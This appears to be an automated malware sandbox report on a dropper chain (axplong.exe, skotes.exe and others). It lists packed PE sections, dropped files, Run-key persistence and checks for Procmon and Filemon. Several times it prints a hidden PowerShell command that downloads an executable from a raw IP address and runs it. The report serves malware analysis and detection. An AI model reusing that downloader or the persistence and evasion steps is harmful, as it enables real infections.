Source: softokn3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr	Static PE information: section name: .didat
Source: nss3.dll.8.dr	Static PE information: section name: .00cfg
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: rihpxjyu
Source: skotes.exe.9.dr	Static PE information: section name: fruizeat
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: random[3].exe.14.dr	Static PE information: section name:
Source: random[3].exe.14.dr	Static PE information: section name: .idata
Source: random[3].exe.14.dr	Static PE information: section name:
Source: random[3].exe.14.dr	Static PE information: section name: zqjesnms
Source: random[3].exe.14.dr	Static PE information: section name: itcibofp
Source: random[3].exe.14.dr	Static PE information: section name: .taggant
Source: eb74aeb58b.exe.14.dr	Static PE information: section name:
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: .idata
Source: eb74aeb58b.exe.14.dr	Static PE information: section name:
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: zqjesnms
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: itcibofp
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: .taggant
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name: .idata
Source: random[1].exe.14.dr	Static PE information: section name:
Source: random[1].exe.14.dr	Static PE information: section name: hvnpreno
Source: random[1].exe.14.dr	Static PE information: section name: wfgtnlfw
Source: random[1].exe.14.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00D4D84C push ecx; ret		6_2_00D4D85F
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Code function: 8_2_6C47B536 push ecx; ret		8_2_6C47B549

Source: 0xqfQZufeQ.exe	Static PE information: section name: entropy: 7.98409999714685
Source: 0xqfQZufeQ.exe	Static PE information: section name: xzmpyxck entropy: 7.955003007166021
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.98409999714685
Source: axplong.exe.0.dr	Static PE information: section name: xzmpyxck entropy: 7.955003007166021
Source: random[1].exe.6.dr	Static PE information: section name: dxkyhxuw entropy: 7.95457879562859
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: dxkyhxuw entropy: 7.95457879562859
Source: random[1].exe0.6.dr	Static PE information: section name: entropy: 7.979953974782096
Source: 8166ff9922.exe.6.dr	Static PE information: section name: entropy: 7.979953974782096
Source: random[1].exe1.6.dr	Static PE information: section name: jccfkdhg entropy: 7.949489391174788
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: jccfkdhg entropy: 7.949489391174788
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.979953974782096
Source: Y-Cleaner.exe.13.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].13.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: random[3].exe.14.dr	Static PE information: section name: entropy: 7.98292861859206
Source: random[3].exe.14.dr	Static PE information: section name: zqjesnms entropy: 7.952975372450472
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: entropy: 7.98292861859206
Source: eb74aeb58b.exe.14.dr	Static PE information: section name: zqjesnms entropy: 7.952975372450472
Source: random[1].exe.14.dr	Static PE information: section name: entropy: 7.978049142281814
Source: random[1].exe.14.dr	Static PE information: section name: hvnpreno entropy: 7.954275147331357

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Temp\5DWsYef8WwGeGz5\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempGZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File created: C:\Users\user\AppData\Local\Temp\OZ97C0E8CHM2D2S9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Temp\5DWsYef8WwGeGz5\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062156001\e2e9840d77.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062157001\6e8173898b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062154001\ddea05ffa5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062155001\f1410e5168.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dll[1]			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\soft[1]			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a103019032.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f1ada1ce1.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0f39a8c7db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8166ff9922.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0c43e4c1fb.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8f4d1353d2.exe

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: Filemonclass
